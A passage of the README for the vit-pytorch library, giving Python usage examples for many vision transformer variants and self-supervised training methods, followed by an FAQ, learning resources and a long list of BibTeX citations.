href="https://github.com/zankner">Zach</a>, you can train using the original masked patch prediction task presented in the paper, with the following code. ```python import torch from vit_pytorch import ViT from vit_pytorch.mpp import MPP model = ViT( image_size=256, patch_size=32, num_classes=1000, dim=1024, depth=6, heads=8, mlp_dim=2048, dropout=0.1, emb_dropout=0.1 ) mpp_trainer = MPP( transformer=model, patch_size=32, dim=1024, mask_prob=0.15, # probability of using token in masked prediction task random_patch_prob=0.30, # probability of randomly replacing a token being used for mpp replace_prob=0.50, # probability of replacing a token being used for mpp with the mask token ) opt = torch.optim.Adam(mpp_trainer.parameters(), lr=3e-4) def sample_unlabelled_images(): return torch.FloatTensor(20, 3, 256, 256).uniform_(0., 1.) for _ in range(100): images = sample_unlabelled_images() loss = mpp_trainer(images) opt.zero_grad() loss.backward() opt.step() # save your improved network torch.save(model.state_dict(), './pretrained-net.pt') ``` ## Masked Position Prediction <img src="./images/mp3.png" width="400px"></img> New <a href="https://arxiv.org/abs/2207.07611">paper</a> that introduces masked position prediction pre-training criteria. This strategy is more efficient than the Masked Autoencoder strategy and has comparable performance. ```python import torch from vit_pytorch.mp3 import ViT, MP3 v = ViT( num_classes = 1000, image_size = 256, patch_size = 8, dim = 1024, depth = 6, heads = 8, mlp_dim = 2048, dropout = 0.1, ) mp3 = MP3( vit = v, masking_ratio = 0.75 ) images = torch.randn(8, 3, 256, 256) loss = mp3(images) loss.backward() # that's all! # do the above in a for loop many times with a lot of images and your vision transformer will learn # save your improved vision transformer torch.save(v.state_dict(), './trained-vit.pt') ``` ## Adaptive Token Sampling <img src="./images/ats.png" width="400px"></img> This <a href="https://arxiv.org/abs/2111.15667">paper</a> proposes to use the CLS attention scores, re-weighed by the norms of the value heads, as means to discard unimportant tokens at different layers. ```python import torch from vit_pytorch.ats_vit import ViT v = ViT( image_size = 256, patch_size = 16, num_classes = 1000, dim = 1024, depth = 6, max_tokens_per_depth = (256, 128, 64, 32, 16, 8), # a tuple that denotes the maximum number of tokens that any given layer should have. if the layer has greater than this amount, it will undergo adaptive token sampling heads = 16, mlp_dim = 2048, dropout = 0.1, emb_dropout = 0.1 ) img = torch.randn(4, 3, 256, 256) preds = v(img) # (4, 1000) # you can also get a list of the final sampled patch ids # a value of -1 denotes padding preds, token_ids = v(img, return_sampled_token_ids = True) # (4, 1000), (4, <=8) ``` ## Patch Merger <img src="./images/patch_merger.png" width="400px"></img> This <a href="https://arxiv.org/abs/2202.12015">paper</a> proposes a simple module (Patch Merger) for reducing the number of tokens at any layer of a vision transformer without sacrificing performance. ```python import torch from vit_pytorch.vit_with_patch_merger import ViT v = ViT( image_size = 256, patch_size = 16, num_classes = 1000, dim = 1024, depth = 12, heads = 8, patch_merge_layer = 6, # at which transformer layer to do patch merging patch_merge_num_tokens = 8, # the output number of tokens from the patch merge mlp_dim = 2048, dropout = 0.1, emb_dropout = 0.1 ) img = torch.randn(4, 3, 256, 256) preds = v(img) # (4, 1000) ``` One can also use the `PatchMerger` module by itself ```python import torch from vit_pytorch.vit_with_patch_merger import PatchMerger merger = PatchMerger( dim = 1024, num_tokens_out = 8 # output number of tokens ) features = torch.randn(4, 256, 1024) # (batch, num tokens, dimension) out = merger(features) # (4, 8, 1024) ``` ## Vision Transformer for Small Datasets <img src="./images/vit_for_small_datasets.png" width="400px"></img> This <a href="https://arxiv.org/abs/2112.13492">paper</a> proposes a new image to patch function that incorporates shifts of the image, before normalizing and dividing the image into patches. I have found shifting to be extremely helpful in some other transformers work, so decided to include this for further explorations. It also includes the `LSA` with the learned temperature and masking out of a token's attention to itself. You can use as follows: ```python import torch from vit_pytorch.vit_for_small_dataset import ViT v = ViT( image_size = 256, patch_size = 16, num_classes = 1000, dim = 1024, depth = 6, heads = 16, mlp_dim = 2048, dropout = 0.1, emb_dropout = 0.1 ) img = torch.randn(4, 3, 256, 256) preds = v(img) # (1, 1000) ``` You can also use the `SPT` from this paper as a standalone module ```python import torch from vit_pytorch.vit_for_small_dataset import SPT spt = SPT( dim = 1024, patch_size = 16, channels = 3 ) img = torch.randn(4, 3, 256, 256) tokens = spt(img) # (4, 256, 1024) ``` ## 3D ViT By popular request, I will start extending a few of the architectures in this repository to 3D ViTs, for use with video, medical imaging, etc. You will need to pass in two additional hyperparameters: (1) the number of frames `frames` and (2) patch size along the frame dimension `frame_patch_size` For starters, 3D ViT ```python import torch from vit_pytorch.vit_3d import ViT v = ViT( image_size = 128, # image size frames = 16, # number of frames image_patch_size = 16, # image patch size frame_patch_size = 2, # frame patch size num_classes = 1000, dim = 1024, depth = 6, heads = 8, mlp_dim = 2048, dropout = 0.1, emb_dropout = 0.1 ) video = torch.randn(4, 3, 16, 128, 128) # (batch, channels, frames, height, width) preds = v(video) # (4, 1000) ``` 3D Simple ViT ```python import torch from vit_pytorch.simple_vit_3d import SimpleViT v = SimpleViT( image_size = 128, # image size frames = 16, # number of frames image_patch_size = 16, # image patch size frame_patch_size = 2, # frame patch size num_classes = 1000, dim = 1024, depth = 6, heads = 8, mlp_dim = 2048 ) video = torch.randn(4, 3, 16, 128, 128) # (batch, channels, frames, height, width) preds = v(video) # (4, 1000) ``` 3D version of <a href="https://github.com/lucidrains/vit-pytorch#cct">CCT</a> ```python import torch from vit_pytorch.cct_3d import CCT cct = CCT( img_size = 224, num_frames = 8, embedding_dim = 384, n_conv_layers = 2, frame_kernel_size = 3, kernel_size = 7, stride = 2, padding = 3, pooling_kernel_size = 3, pooling_stride = 2, pooling_padding = 1, num_layers = 14, num_heads = 6, mlp_ratio = 3., num_classes = 1000, positional_embedding = 'learnable' ) video = torch.randn(1, 3, 8, 224, 224) # (batch, channels, frames, height, width) pred = cct(video) ``` ## ViViT <img src="./images/vivit.png" width="350px"></img> This <a href="https://arxiv.org/abs/2103.15691">paper</a> offers 3 different types of architectures for efficient attention of videos, with the main theme being factorizing the attention across space and time. This repository includes the factorized encoder and the factorized self-attention variant. The factorized encoder variant is a spatial transformer followed by a temporal one. The factorized self-attention variant is a spatio-temporal transformer with alternating spatial and temporal self-attention layers. ```python import torch from vit_pytorch.vivit import ViT v = ViT( image_size = 128, # image size frames = 16, # number of frames image_patch_size = 16, # image patch size frame_patch_size = 2, # frame patch size num_classes = 1000, dim = 1024, spatial_depth = 6, # depth of the spatial transformer temporal_depth = 6, # depth of the temporal transformer heads = 8, mlp_dim = 2048, variant = 'factorized_encoder', # or 'factorized_self_attention' ) video = torch.randn(4, 3, 16, 128, 128) # (batch, channels, frames, height, width) preds = v(video) # (4, 1000) ``` ## Parallel ViT <img src="./images/parallel-vit.png" width="350px"></img> This <a href="https://arxiv.org/abs/2203.09795">paper</a> propose parallelizing multiple attention and feedforward blocks per layer (2 blocks), claiming that it is easier to train without loss of performance. You can try this variant as follows ```python import torch from vit_pytorch.parallel_vit import ViT v = ViT( image_size = 256, patch_size = 16, num_classes = 1000, dim = 1024, depth = 6, heads = 8, mlp_dim = 2048, num_parallel_branches = 2, # in paper, they claimed 2 was optimal dropout = 0.1, emb_dropout = 0.1 ) img = torch.randn(4, 3, 256, 256) preds = v(img) # (4, 1000) ``` ## Learnable Memory ViT <img src="./images/learnable-memory-vit.png" width="350px"></img> This <a href="https://arxiv.org/abs/2203.15243">paper</a> shows that adding learnable memory tokens at each layer of a vision transformer can greatly enhance fine-tuning results (in addition to learnable task specific CLS token and adapter head). You can use this with a specially modified `ViT` as follows ```python import torch from vit_pytorch.learnable_memory_vit import ViT, Adapter # normal base ViT v = ViT( image_size = 256, patch_size = 16, num_classes = 1000, dim = 1024, depth = 6, heads = 8, mlp_dim = 2048, dropout = 0.1, emb_dropout = 0.1 ) img = torch.randn(4, 3, 256, 256) logits = v(img) # (4, 1000) # do your usual training with ViT # ... # then, to finetune, just pass the ViT into the Adapter class # you can do this for multiple Adapters, as shown below adapter1 = Adapter( vit = v, num_classes = 2, # number of output classes for this specific task num_memories_per_layer = 5 # number of learnable memories per layer, 10 was sufficient in paper ) logits1 = adapter1(img) # (4, 2) - predict 2 classes off frozen ViT backbone with learnable memories and task specific head # yet another task to finetune on, this time with 4 classes adapter2 = Adapter( vit = v, num_classes = 4, num_memories_per_layer = 10 ) logits2 = adapter2(img) # (4, 4) - predict 4 classes off frozen ViT backbone with learnable memories and task specific head ``` ## Dino <img src="./images/dino.png" width="350px"></img> You can train `ViT` with the recent SOTA self-supervised learning technique, <a href="https://arxiv.org/abs/2104.14294">Dino</a>, with the following code. <a href="https://www.youtube.com/watch?v=h3ij3F3cPIk">Yannic Kilcher</a> video ```python import torch from vit_pytorch import ViT, Dino model = ViT( image_size = 256, patch_size = 32, num_classes = 1000, dim = 1024, depth = 6, heads = 8, mlp_dim = 2048 ) learner = Dino( model, image_size = 256, hidden_layer = 'to_latent', # hidden layer name or index, from which to extract the embedding projection_hidden_size = 256, # projector network hidden dimension projection_layers = 4, # number of layers in projection network num_classes_K = 65336, # output logits dimensions (referenced as K in paper) student_temp = 0.9, # student temperature teacher_temp = 0.04, # teacher temperature, needs to be annealed from 0.04 to 0.07 over 30 epochs local_upper_crop_scale = 0.4, # upper bound for local crop - 0.4 was recommended in the paper global_lower_crop_scale = 0.5, # lower bound for global crop - 0.5 was recommended in the paper moving_average_decay = 0.9, # moving average of encoder - paper showed anywhere from 0.9 to 0.999 was ok center_moving_average_decay = 0.9, # moving average of teacher centers - paper showed anywhere from 0.9 to 0.999 was ok ) opt = torch.optim.Adam(learner.parameters(), lr = 3e-4) def sample_unlabelled_images(): return torch.randn(20, 3, 256, 256) for _ in range(100): images = sample_unlabelled_images() loss = learner(images) opt.zero_grad() loss.backward() opt.step() learner.update_moving_average() # update moving average of teacher encoder and teacher centers # save your improved network torch.save(model.state_dict(), './pretrained-net.pt') ``` ## EsViT <img src="./images/esvit.png" width="350px"></img> <a href="https://arxiv.org/abs/2106.09785">`EsViT`</a> is a variant of Dino (from above) re-engineered to support efficient `ViT`s with patch merging / downsampling by taking into an account an extra regional loss between the augmented views. To quote the abstract, it `outperforms its supervised counterpart on 17 out of 18 datasets` at 3 times higher throughput. Even though it is named as though it were a new `ViT` variant, it actually is just a strategy for training any multistage `ViT` (in the paper, they focused on Swin). The example below will show how to use it with `CvT`. You'll need to set the `hidden_layer` to the name of the layer within your efficient ViT that outputs the non-average pooled visual representations, just before the global pooling and projection to logits. ```python import torch from vit_pytorch.cvt import CvT from vit_pytorch.es_vit import EsViTTrainer cvt = CvT( num_classes = 1000, s1_emb_dim = 64, s1_emb_kernel = 7, s1_emb_stride = 4, s1_proj_kernel = 3, s1_kv_proj_stride = 2, s1_heads = 1, s1_depth = 1, s1_mlp_mult = 4, s2_emb_dim = 192, s2_emb_kernel = 3, s2_emb_stride = 2, s2_proj_kernel = 3, s2_kv_proj_stride = 2, s2_heads = 3, s2_depth = 2, s2_mlp_mult = 4, s3_emb_dim = 384, s3_emb_kernel = 3, s3_emb_stride = 2, s3_proj_kernel = 3, s3_kv_proj_stride = 2, s3_heads = 4, s3_depth = 10, s3_mlp_mult = 4, dropout = 0. ) learner = EsViTTrainer( cvt, image_size = 256, hidden_layer = 'layers', # hidden layer name or index, from which to extract the embedding projection_hidden_size = 256, # projector network hidden dimension projection_layers = 4, # number of layers in projection network num_classes_K = 65336, # output logits dimensions (referenced as K in paper) student_temp = 0.9, # student temperature teacher_temp = 0.04, # teacher temperature, needs to be annealed from 0.04 to 0.07 over 30 epochs local_upper_crop_scale = 0.4, # upper bound for local crop - 0.4 was recommended in the paper global_lower_crop_scale = 0.5, # lower bound for global crop - 0.5 was recommended in the paper moving_average_decay = 0.9, # moving average of encoder - paper showed anywhere from 0.9 to 0.999 was ok center_moving_average_decay = 0.9, # moving average of teacher centers - paper showed anywhere from 0.9 to 0.999 was ok ) opt = torch.optim.AdamW(learner.parameters(), lr = 3e-4) def sample_unlabelled_images(): return torch.randn(8, 3, 256, 256) for _ in range(1000): images = sample_unlabelled_images() loss = learner(images) opt.zero_grad() loss.backward() opt.step() learner.update_moving_average() # update moving average of teacher encoder and teacher centers # save your improved network torch.save(cvt.state_dict(), './pretrained-net.pt') ``` ## Accessing Attention If you would like to visualize the attention weights (post-softmax) for your research, just follow the procedure below ```python import torch from vit_pytorch.vit import ViT v = ViT( image_size = 256, patch_size = 32, num_classes = 1000, dim = 1024, depth = 6, heads = 16, mlp_dim = 2048, dropout = 0.1, emb_dropout = 0.1 ) # import Recorder and wrap the ViT from vit_pytorch.recorder import Recorder v = Recorder(v) # forward pass now returns predictions and the attention maps img = torch.randn(1, 3, 256, 256) preds, attns = v(img) # there is one extra patch due to the CLS token attns # (1, 6, 16, 65, 65) - (batch x layers x heads x patch x patch) ``` to cleanup the class and the hooks once you have collected enough data ```python v = v.eject() # wrapper is discarded and original ViT instance is returned ``` ## Accessing Embeddings You can similarly access the embeddings with the `Extractor` wrapper ```python import torch from vit_pytorch.vit import ViT v = ViT( image_size = 256, patch_size = 32, num_classes = 1000, dim = 1024, depth = 6, heads = 16, mlp_dim = 2048, dropout = 0.1, emb_dropout = 0.1 ) # import Recorder and wrap the ViT from vit_pytorch.extractor import Extractor v = Extractor(v) # forward pass now returns predictions and the attention maps img = torch.randn(1, 3, 256, 256) logits, embeddings = v(img) # there is one extra token due to the CLS token embeddings # (1, 65, 1024) - (batch x patches x model dim) ``` Or say for `CrossViT`, which has a multi-scale encoder that outputs two sets of embeddings for 'large' and 'small' scales ```python import torch from vit_pytorch.cross_vit import CrossViT v = CrossViT( image_size = 256, num_classes = 1000, depth = 4, sm_dim = 192, sm_patch_size = 16, sm_enc_depth = 2, sm_enc_heads = 8, sm_enc_mlp_dim = 2048, lg_dim = 384, lg_patch_size = 64, lg_enc_depth = 3, lg_enc_heads = 8, lg_enc_mlp_dim = 2048, cross_attn_depth = 2, cross_attn_heads = 8, dropout = 0.1, emb_dropout = 0.1 ) # wrap the CrossViT from vit_pytorch.extractor import Extractor v = Extractor(v, layer_name = 'multi_scale_encoder') # take embedding coming from the output of multi-scale-encoder # forward pass now returns predictions and the attention maps img = torch.randn(1, 3, 256, 256) logits, embeddings = v(img) # there is one extra token due to the CLS token embeddings # ((1, 257, 192), (1, 17, 384)) - (batch x patches x dimension) <- large and small scales respectively ``` ## Research Ideas ### Efficient Attention There may be some coming from computer vision who think attention still suffers from quadratic costs. Fortunately, we have a lot of new techniques that may help. This repository offers a way for you to plugin your own sparse attention transformer. An example with <a href="https://arxiv.org/abs/2102.03902">Nystromformer</a> ```bash $ pip install nystrom-attention ``` ```python import torch from vit_pytorch.efficient import ViT from nystrom_attention import Nystromformer efficient_transformer = Nystromformer( dim = 512, depth = 12, heads = 8, num_landmarks = 256 ) v = ViT( dim = 512, image_size = 2048, patch_size = 32, num_classes = 1000, transformer = efficient_transformer ) img = torch.randn(1, 3, 2048, 2048) # your high resolution picture v(img) # (1, 1000) ``` Other sparse attention frameworks I would highly recommend is <a href="https://github.com/lucidrains/routing-transformer">Routing Transformer</a> or <a href="https://github.com/lucidrains/sinkhorn-transformer">Sinkhorn Transformer</a> ### Combining with other Transformer improvements This paper purposely used the most vanilla of attention networks to make a statement. If you would like to use some of the latest improvements for attention nets, please use the `Encoder` from <a href="https://github.com/lucidrains/x-transformers">this repository</a>. ex. ```bash $ pip install x-transformers ``` ```python import torch from vit_pytorch.efficient import ViT from x_transformers import Encoder v = ViT( dim = 512, image_size = 224, patch_size = 16, num_classes = 1000, transformer = Encoder( dim = 512, # set to be the same as the wrapper depth = 12, heads = 8, ff_glu = True, # ex. feed forward GLU variant https://arxiv.org/abs/2002.05202 residual_attn = True # ex. residual attention https://arxiv.org/abs/2012.11747 ) ) img = torch.randn(1, 3, 224, 224) v(img) # (1, 1000) ``` ## FAQ - How do I pass in non-square images? You can already pass in non-square images - you just have to make sure your height and width is less than or equal to the `image_size`, and both divisible by the `patch_size` ex. ```python import torch from vit_pytorch import ViT v = ViT( image_size = 256, patch_size = 32, num_classes = 1000, dim = 1024, depth = 6, heads = 16, mlp_dim = 2048, dropout = 0.1, emb_dropout = 0.1 ) img = torch.randn(1, 3, 256, 128) # <-- not a square preds = v(img) # (1, 1000) ``` - How do I pass in non-square patches? ```python import torch from vit_pytorch import ViT v = ViT( num_classes = 1000, image_size = (256, 128), # image size is a tuple of (height, width) patch_size = (32, 16), # patch size is a tuple of (height, width) dim = 1024, depth = 6, heads = 16, mlp_dim = 2048, dropout = 0.1, emb_dropout = 0.1 ) img = torch.randn(1, 3, 256, 128) preds = v(img) ``` ## Resources Coming from computer vision and new to transformers? Here are some resources that greatly accelerated my learning. 1. <a href="http://jalammar.github.io/illustrated-transformer/">Illustrated Transformer</a> - Jay Alammar 2. <a href="http://peterbloem.nl/blog/transformers">Transformers from Scratch</a> - Peter Bloem 3. <a href="https://nlp.seas.harvard.edu/2018/04/03/attention.html">The Annotated Transformer</a> - Harvard NLP ## Citations ```bibtex @article{hassani2021escaping, title = {Escaping the Big Data Paradigm with Compact Transformers}, author = {Ali Hassani and Steven Walton and Nikhil Shah and Abulikemu Abuduweili and Jiachen Li and Humphrey Shi}, year = 2021, url = {https://arxiv.org/abs/2104.05704}, eprint = {2104.05704}, archiveprefix = {arXiv}, primaryclass = {cs.CV} } ``` ```bibtex @misc{dosovitskiy2020image, title = {An Image is Worth 16x16 Words: Transformers for Image Recognition at Scale}, author = {Alexey Dosovitskiy and Lucas Beyer and Alexander Kolesnikov and Dirk Weissenborn and Xiaohua Zhai and Thomas Unterthiner and Mostafa Dehghani and Matthias Minderer and Georg Heigold and Sylvain Gelly and Jakob Uszkoreit and Neil Houlsby}, year = {2020}, eprint = {2010.11929}, archivePrefix = {arXiv}, primaryClass = {cs.CV} } ``` ```bibtex @misc{touvron2020training, title = {Training data-efficient image transformers & distillation through attention}, author = {Hugo Touvron and Matthieu Cord and Matthijs Douze and Francisco Massa and Alexandre Sablayrolles and Hervé Jégou}, year = {2020}, eprint = {2012.12877}, archivePrefix = {arXiv}, primaryClass = {cs.CV} } ``` ```bibtex @misc{yuan2021tokenstotoken, title = {Tokens-to-Token ViT: Training Vision Transformers from Scratch on ImageNet}, author = {Li Yuan and Yunpeng Chen and Tao Wang and Weihao Yu and Yujun Shi and Francis EH Tay and Jiashi Feng and Shuicheng Yan}, year = {2021}, eprint = {2101.11986}, archivePrefix = {arXiv}, primaryClass = {cs.CV} } ``` ```bibtex @misc{zhou2021deepvit, title = {DeepViT: Towards Deeper Vision Transformer}, author = {Daquan Zhou and Bingyi Kang and Xiaojie Jin and Linjie Yang and Xiaochen Lian and Qibin Hou and Jiashi Feng}, year = {2021}, eprint = {2103.11886}, archivePrefix = {arXiv}, primaryClass = {cs.CV} } ``` ```bibtex @misc{touvron2021going, title = {Going deeper with Image Transformers}, author = {Hugo Touvron and Matthieu Cord and Alexandre Sablayrolles and Gabriel Synnaeve and Hervé Jégou}, year = {2021}, eprint = {2103.17239}, archivePrefix = {arXiv}, primaryClass = {cs.CV} } ``` ```bibtex @misc{chen2021crossvit, title = {CrossViT: Cross-Attention Multi-Scale Vision Transformer for Image Classification}, author = {Chun-Fu Chen and Quanfu Fan and Rameswar Panda}, year = {2021}, eprint = {2103.14899}, archivePrefix = {arXiv}, primaryClass = {cs.CV} } ``` ```bibtex @misc{wu2021cvt, title = {CvT: Introducing Convolutions to Vision Transformers}, author = {Haiping Wu and Bin Xiao and Noel Codella and Mengchen Liu and Xiyang Dai and Lu Yuan and Lei Zhang}, year = {2021}, eprint = {2103.15808}, archivePrefix = {arXiv}, primaryClass = {cs.CV} } ``` ```bibtex @misc{heo2021rethinking, title = {Rethinking Spatial Dimensions of Vision Transformers}, author = {Byeongho Heo and Sangdoo Yun and Dongyoon Han and Sanghyuk Chun and Junsuk Choe and Seong Joon Oh}, year = {2021}, eprint = {2103.16302}, archivePrefix = {arXiv}, primaryClass = {cs.CV} } ``` ```bibtex @misc{graham2021levit, title = {LeViT: a Vision Transformer in ConvNet's Clothing for Faster Inference}, author = {Ben Graham and Alaaeldin El-Nouby and Hugo Touvron and Pierre Stock and Armand Joulin and Hervé Jégou and Matthijs Douze}, year = {2021}, eprint = {2104.01136}, archivePrefix = {arXiv}, primaryClass = {cs.CV} } ``` ```bibtex @misc{li2021localvit, title = {LocalViT: Bringing Locality to Vision Transformers}, author = {Yawei Li and Kai Zhang and Jiezhang Cao and Radu Timofte and Luc Van Gool}, year = {2021}, eprint = {2104.05707}, archivePrefix = {arXiv}, primaryClass = {cs.CV} } ``` ```bibtex @misc{chu2021twins, title = {Twins: Revisiting Spatial Attention Design in Vision Transformers}, author = {Xiangxiang Chu and Zhi Tian and Yuqing Wang and Bo Zhang and Haibing Ren and Xiaolin Wei and Huaxia Xia and Chunhua Shen}, year = {2021}, eprint = {2104.13840}, archivePrefix = {arXiv}, primaryClass = {cs.CV} } ``` ```bibtex @misc{su2021roformer, title = {RoFormer: Enhanced Transformer with Rotary Position Embedding}, author = {Jianlin Su and Yu Lu and Shengfeng Pan and Bo Wen and Yunfeng Liu}, year = {2021}, eprint = {2104.09864}, archivePrefix = {arXiv}, primaryClass = {cs.CL} } ``` ```bibtex @misc{zhang2021aggregating, title = {Aggregating Nested Transformers}, author = {Zizhao Zhang and Han Zhang and Long Zhao and Ting Chen and Tomas Pfister}, year = {2021}, eprint = {2105.12723}, archivePrefix = {arXiv}, primaryClass = {cs.CV} } ``` ```bibtex @misc{chen2021regionvit, title = {RegionViT: Regional-to-Local Attention for Vision Transformers}, author = {Chun-Fu Chen and Rameswar Panda and Quanfu Fan}, year = {2021}, eprint = {2106.02689}, archivePrefix = {arXiv}, primaryClass = {cs.CV} } ``` ```bibtex @misc{wang2021crossformer, title = {CrossFormer: A Versatile Vision Transformer Hinging on Cross-scale Attention}, author = {Wenxiao Wang and Lu Yao and Long Chen and Binbin Lin and Deng Cai and Xiaofei He and Wei Liu}, year = {2021}, eprint = {2108.00154}, archivePrefix = {arXiv}, primaryClass = {cs.CV} } ``` ```bibtex @misc{caron2021emerging, title = {Emerging Properties in Self-Supervised Vision Transformers}, author = {Mathilde Caron and Hugo Touvron and Ishan Misra and Hervé Jégou and Julien Mairal and Piotr Bojanowski and Armand Joulin}, year = {2021}, eprint = {2104.14294}, archivePrefix = {arXiv}, primaryClass = {cs.CV} } ``` ```bibtex @misc{he2021masked, title = {Masked Autoencoders Are Scalable Vision Learners}, author = {Kaiming He and Xinlei Chen and Saining Xie and Yanghao Li and Piotr Dollár and Ross Girshick}, year = {2021}, eprint = {2111.06377}, archivePrefix = {arXiv}, primaryClass = {cs.CV} } ``` ```bibtex @misc{xie2021simmim, title = {SimMIM: A Simple Framework for Masked Image Modeling}, author = {Zhenda Xie and Zheng Zhang and Yue Cao and Yutong Lin and Jianmin Bao and Zhuliang Yao and Qi Dai and Han Hu}, year = {2021}, eprint = {2111.09886}, archivePrefix = {arXiv}, primaryClass = {cs.CV} } ``` ```bibtex @misc{fayyaz2021ats, title = {ATS: Adaptive Token Sampling For Efficient Vision Transformers}, author = {Mohsen Fayyaz and Soroush Abbasi Kouhpayegani and Farnoush Rezaei Jafari and Eric Sommerlade and Hamid Reza Vaezi Joze and Hamed Pirsiavash and Juergen Gall}, year = {2021}, eprint = {2111.15667}, archivePrefix = {arXiv}, primaryClass = {cs.CV} } ``` ```bibtex @misc{mehta2021mobilevit, title = {MobileViT: Light-weight, General-purpose, and Mobile-friendly Vision Transformer}, author = {Sachin Mehta and Mohammad Rastegari}, year = {2021}, eprint = {2110.02178}, archivePrefix = {arXiv}, primaryClass = {cs.CV} } ``` ```bibtex @misc{lee2021vision, title = {Vision Transformer for Small-Size Datasets}, author = {Seung Hoon Lee and Seunghyun Lee and Byung Cheol Song}, year = {2021}, eprint = {2112.13492}, archivePrefix = {arXiv}, primaryClass = {cs.CV} } ``` ```bibtex @misc{renggli2022learning, title = {Learning to Merge Tokens in Vision Transformers}, author = {Cedric Renggli and André Susano Pinto and Neil Houlsby and Basil Mustafa and Joan Puigcerver and Carlos Riquelme}, year = {2022}, eprint = {2202.12015}, archivePrefix = {arXiv}, primaryClass = {cs.CV} } ``` ```bibtex @misc{yang2022scalablevit, title = {ScalableViT: Rethinking the Context-oriented Generalization of Vision Transformer}, author = {Rui Yang and Hailong Ma and Jie Wu and Yansong Tang and Xuefeng Xiao and Min Zheng and Xiu Li}, year = {2022}, eprint = {2203.10790}, archivePrefix = {arXiv}, primaryClass = {cs.CV} } ``` ```bibtex @inproceedings{Touvron2022ThreeTE, title = {Three things everyone should know about Vision Transformers}, author = {Hugo Touvron and Matthieu Cord and Alaaeldin El-Nouby and Jakob Verbeek and Herv'e J'egou}, year = {2022} } ``` ```bibtex @inproceedings{Sandler2022FinetuningIT, title = {Fine-tuning Image Transformers using Learnable Memory}, author = {Mark Sandler and Andrey Zhmoginov and Max Vladymyrov and Andrew Jackson}, year = {2022} } ``` ```bibtex @inproceedings{Li2022SepViTSV, title = {SepViT: Separable Vision Transformer}, author = {Wei Li and Xing Wang and Xin Xia and Jie Wu and Xuefeng Xiao and Minghang Zheng and Shiping Wen}, year = {2022} } ``` ```bibtex @inproceedings{Tu2022MaxViTMV, title = {MaxViT: Multi-Axis Vision Transformer}, author = {Zhengzhong Tu and Hossein Talebi and Han Zhang and Feng Yang and Peyman Milanfar and Alan Conrad Bovik and Yinxiao Li}, year = {2022} } ``` ```bibtex @article{Li2021EfficientSV, title = {Efficient Self-supervised Vision Transformers for Representation Learning}, author = {Chunyuan Li and Jianwei Yang and Pengchuan Zhang and Mei Gao and Bin Xiao and Xiyang Dai and Lu Yuan and Jianfeng Gao}, journal = {ArXiv}, year = {2021}, volume = {abs/2106.09785} } ``` ```bibtex @misc{Beyer2022BetterPlainViT title = {Better plain ViT baselines for ImageNet-1k}, author = {Beyer, Lucas and Zhai, Xiaohua and Kolesnikov, Alexander}, publisher = {arXiv}, year = {2022} } ``` ```bibtex @article{Arnab2021ViViTAV, title = {ViViT: A Video Vision Transformer}, author = {Anurag Arnab and Mostafa Dehghani and Georg Heigold and Chen Sun and Mario Lucic and Cordelia Schmid}, journal = {2021 IEEE/CVF International Conference on Computer Vision (ICCV)}, year = {2021}, pages = {6816-6826} } ``` ```bibtex @article{Liu2022PatchDropoutEV, title = {PatchDropout: Economizing Vision Transformers Using Patch Dropout}, author = {Yue Liu and Christos Matsoukas and Fredrik Strand and Hossein Azizpour and Kevin Smith}, journal = {ArXiv}, year = {2022}, volume = {abs/2208.07220} } ``` ```bibtex @misc{https://doi.org/10.48550/arxiv.2302.01327, doi = {10.48550/ARXIV.2302.01327}, url = {https://arxiv.org/abs/2302.01327}, author = {Kumar, Manoj and Dehghani, Mostafa and Houlsby, Neil}, title = {Dual PatchNorm}, publisher = {arXiv}, year = {2023}, copyright = {Creative Commons Attribution 4.0 International} } ``` ```bibtex @inproceedings{Dehghani2023PatchNP, title = {Patch n' Pack: NaViT, a Vision Transformer for any Aspect Ratio and Resolution}, author = {Mostafa Dehghani and Basil Mustafa and Josip Djolonga and Jonathan Heek and Matthias Minderer and Mathilde Caron and Andreas Steiner and Joan Puigcerver and Robert Geirhos and Ibrahim M. Alabdulmohsin and Avital Oliver and Piotr Padlewski and Alexey A. Gritsenko and Mario Luvci'c and Neil Houlsby}, year = {2023} } ``` ```bibtex @misc{vaswani2017attention, title = {Attention Is All You Need}, author = {Ashish Vaswani and Noam Shazeer and Niki Parmar and Jakob Uszkoreit and Llion Jones and Aidan N. Gomez and Lukasz Kaiser and Illia Polosukhin}, year = {2017}, eprint = {1706.03762}, archivePrefix = {arXiv}, primaryClass = {cs.CL} } ``` ```bibtex @inproceedings{dao2022flashattention, title = {Flash{A}ttention: Fast and Memory-Efficient Exact Attention with {IO}-Awareness}, author = {Dao, Tri and Fu, Daniel Y. and Ermon, Stefano and Rudra, Atri and R{\'e}, Christopher}, booktitle = {Advances in Neural Information Processing Systems}, year = {2022} } ``` ```bibtex @inproceedings{Darcet2023VisionTN, title = {Vision Transformers Need Registers}, author = {Timoth'ee Darcet and Maxime Oquab and Julien Mairal and Piotr Bojanowski}, year = {2023}, url = {https://api.semanticscholar.org/CorpusID:263134283} } ``` ```bibtex @inproceedings{ElNouby2021XCiTCI, title = {XCiT: Cross-Covariance Image Transformers}, author = {Alaaeldin El-Nouby and Hugo Touvron and Mathilde Caron and Piotr Bojanowski and Matthijs Douze and Armand Joulin and Ivan Laptev and Natalia Neverova and Gabriel Synnaeve and Jakob Verbeek and Herv{\'e} J{\'e}gou}, booktitle = {Neural Information Processing Systems}, year = {2021}, url = {https://api.semanticscholar.org/CorpusID:235458262} } ``` ```bibtex @inproceedings{Koner2024LookupViTCV, title = {LookupViT: Compressing visual information to a limited number of tokens}, author = {Rajat Koner and Gagan Jain and Prateek Jain and Volker Tresp and Sujoy Paul}, year = {2024}, url = {https://api.semanticscholar.org/CorpusID:271244592} } ``` ```bibtex @article{Bao2022AllAW, title = {All are Worth Words: A ViT Backbone for Diffusion Models}, author = {Fan Bao and Shen Nie and Kaiwen Xue and Yue Cao and Chongxuan Li and Hang Su and Jun Zhu}, journal = {2023 IEEE/CVF Conference on Computer Vision and Pattern Recognition (CVPR)}, year = {2022}, pages = {22669-22679}, url = {https://api.semanticscholar.org/CorpusID:253581703} } ``` ```bibtex @misc{Rubin2024, author = {Ohad Rubin}, url = {https://medium.com/@ohadrubin/exploring-weight-decay-in-layer-normalization-challenges-and-a-reparameterization-solution-ad4d12c24950} } ``` *I visualise a time when we will be to robots what dogs are to humans, and I’m rooting for the machines.* — Claude Shannon
awesome-oss-alternatives
09d7f8b76ef063c5987caf6361110904f449ece6
